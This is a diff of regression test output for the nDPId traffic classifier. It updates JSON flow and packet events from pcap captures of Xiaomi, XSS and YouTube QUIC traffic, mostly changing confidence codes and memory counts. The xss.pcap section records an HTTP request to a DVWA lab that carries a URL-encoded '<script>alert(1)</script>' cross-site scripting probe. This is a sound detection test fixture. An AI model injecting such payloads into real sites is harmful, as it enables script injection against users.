+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625846975,"flow_last_seen":1643625847231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":928,"flow_tot_l4_payload_len":1284,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625858130,"flow_last_seen":1643625858384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1643625848421,"flow_last_seen":1643625997739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":914,"flow_tot_l4_payload_len":1269,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":34,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":5525,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1649853179269} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649853179269,"flow_last_seen":1649853179269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1649853179269,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649853179269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649853179269,"pkt":"eJS0JASgYDjgxTWgCABFAAA82XxAAD8GovfAqAJkEsHperAyFGbKjahPAAAAAKAC\/\/8SCgAAAgQFtAQCCAp5z8VmAAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1649853179291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649853179291,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAPUGxnMSwel6wKgCZBRmsDIvdwKjyo2oUKASaN9j8wAAAgQFrAQCCAqcy3ZJec\/FZgEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1649853179293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1649853179293,"pkt":"eJS0JASgYDjgxTWgCABFAAA02X1AAD8Gov7AqAJkEsHperAyFGbKjahQL3cCpIAQAKz61AAAAQEICnnPxX2cy3ZJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649853179269,"flow_last_seen":1649853179315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1649853179315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649839944752,"flow_last_seen":1649840399901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":933,"flow_tot_l4_payload_len":1618,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1649853179854,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649853179269,"flow_last_seen":1649853179315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1649853179315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649839944752,"flow_last_seen":1649840399901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":933,"flow_tot_l4_payload_len":1618,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1649853179854,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":49,"packets-processed":48,"total-skipped-flows":0,"total-l4-payload-len":7643,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1650283578710} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650283578710,"flow_last_seen":1650283578710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650283578710,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1650283578710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650283578710,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DvVAAD8GnQ7AqAJky2sBQb46AFChwP+pAAAAAKAC\/\/8meQAAAgQFtAQCCArLcGZmAAAAAAEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1650283579013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650283579013,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAACkGwgvLawFBwKgCZABQvjrJa8kHocD\/qoASchB61gAAAgQFrAEBBAIBAwMH"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650283579202,"pkt":"eJS0JASgYDjgxTWgCABFAAAoDvZAAD8GnSHAqAJky2sBQb46AFChwP+qyWvJCFAQAKwtBQAA"} -01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"203.107.1.65","url":"203.107.1.65\/164566\/sign_d?host=appmarket.micloud.xiaomi.net&sdk=android_1.3.3&t=1650284179&s=762f2c07cf9262c61753f45b4117c232&sid=jccM7PF4XY0T&net=wifi&bssid=02%3A00%3A00%3A00%3A00%3A00","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 10; Redmi Note 9 Pro MIUI\/V12.0.3.0.QJZMIXM)"}} +01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"203.107.1.65","url":"203.107.1.65\/164566\/sign_d?host=appmarket.micloud.xiaomi.net&sdk=android_1.3.3&t=1650284179&s=762f2c07cf9262c61753f45b4117c232&sid=jccM7PF4XY0T&net=wifi&bssid=02%3A00%3A00%3A00%3A00%3A00","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 10; Redmi Note 9 Pro MIUI\/V12.0.3.0.QJZMIXM)"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649853179269,"flow_last_seen":1649853538407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":948,"flow_tot_l4_payload_len":2118,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649853179269,"flow_last_seen":1649853538407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":948,"flow_tot_l4_payload_len":2118,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":7991,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1650283579202} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 52/52 @@ -53,9 +53,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889953 bytes -~~ total memory freed........: 5889953 bytes -~~ total allocations/frees...: 118204/118204 +~~ total memory allocated....: 6023587 bytes +~~ total memory freed........: 6023587 bytes +~~ total allocations/frees...: 120966/120966 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 1126 chars diff --git a/test/results/xss.pcap.out b/test/results/xss.pcap.out index 3b1ab2152..7146d32ae 100644 --- a/test/results/xss.pcap.out +++ b/test/results/xss.pcap.out @@ -8,8 +8,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655243489609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655243489609,"pkt":"4CvpcxhCFE+Kc3lPCABFAAA8AABAAEAGspPAqANrwKgDbQBQ0QwZ0GKdt6Q9NKAS\/oiGuQAAAgQFtAQCCAqztRhGkEebngEDAwc="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243489614,"pkt":"FE+Kc3lP4CvpcxhCCABFAAA0\/4hAAEAGsxLAqANtwKgDa9EMAFC3pD00GdBinoAQAfayEgAAAQEICpBHm6SztRhG"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243489614,"pkt":"FE+Kc3lP4CvpcxhCCABFAAA0+yNAAEAGt3fAqANtwKgDa9EKAFDSR62yZEbVlYAQAfZphQAAAQEICpBHm6SztRhG"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":608,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1655243489614,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/xss_d\/?default=English%3Cscript%3Ealert(1)%3C\/script%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655243489609,"flow_last_seen":1655243489620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2451,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":608,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1655243489614,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/xss_d\/?default=English%3Cscript%3Ealert(1)%3C\/script%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655243489609,"flow_last_seen":1655243489620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2451,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":2451,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1655243489620} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871070 bytes -~~ total memory freed........: 5871070 bytes -~~ total allocations/frees...: 118134/118134 +~~ total memory allocated....: 6004704 bytes +~~ total memory freed........: 6004704 bytes +~~ total allocations/frees...: 120896/120896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1059 chars diff --git a/test/results/youtube_quic.pcap.out b/test/results/youtube_quic.pcap.out index 813e8d4f6..6747fe2b8 100644 --- a/test/results/youtube_quic.pcap.out +++ b/test/results/youtube_quic.pcap.out @@ -2,22 +2,22 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1489363823466} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1489363823466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823466,"pkt":"gCqojWksxCwDBkn+CABFAAViKp8AAEARAADAqAEH2DrNQtbVAbsFTmyMDZNw4V58RG0IUTAzNQHEx\/Yat8K2lJx\/xfCgAQAEQ0hMTx0AAABQQUQABgEAAFNOSQAjAQAAU1RLAF0BAABWRVIAYQEAAENDUwBxAQAATk9OQ5EBAABNU1BDlQEAAEFFQUSZAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXBhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tfyKC9MwN17piZVNU\/QkmmE3zDBRwXexEviTXtQHZlZT\/o0M3FJ3WOBZp5lL5RXIaTAX\/iszgW7Ui51EwMzUB6IFgkpIa6H7tgIaiFYKRWMXjbzAwMDAwMDAwAGp0dp4RQa9ev39thoVizX7vQxRkAAAAQ0MyMGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8za3Zj9RsCsgRL78LWSY4+jwAAAABYNTA5AAAQAAEAAAAeAAAAb+PFWAAAAABoJX9SS1LMMIZlh9cGt32w74KlkbfLCJvYbB6phUnjYtV\/J7+3T+WICkKGmxl0apInEplRSWcqg\/3qI+CqJwNXZAAAAAEAAABDMjU1HvdI4XZwU8Me90jhdnBTwz2t9HxBefiRQAt7kKmuees2jgEAnGVpdpNkhQuOQ0r1tyTPo1k8IEM71wOV+MDwud\/WmN8O\/bZt8M5S76zS6GQgUAsZfJUzhYMLh2DzCj0s2UxZDpdWlDQ\/KBiEO80tVmE+bGp5czdFQGnhi\/134fgolaoUotcrvEChNXZdSQ7ze+ZsVxVgDQIPLJn5KItVO0bNTbdFJlK9ck\/6gUes9AlK+Lowm7raNBTPfJpo34tpsNA3toSRqnAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA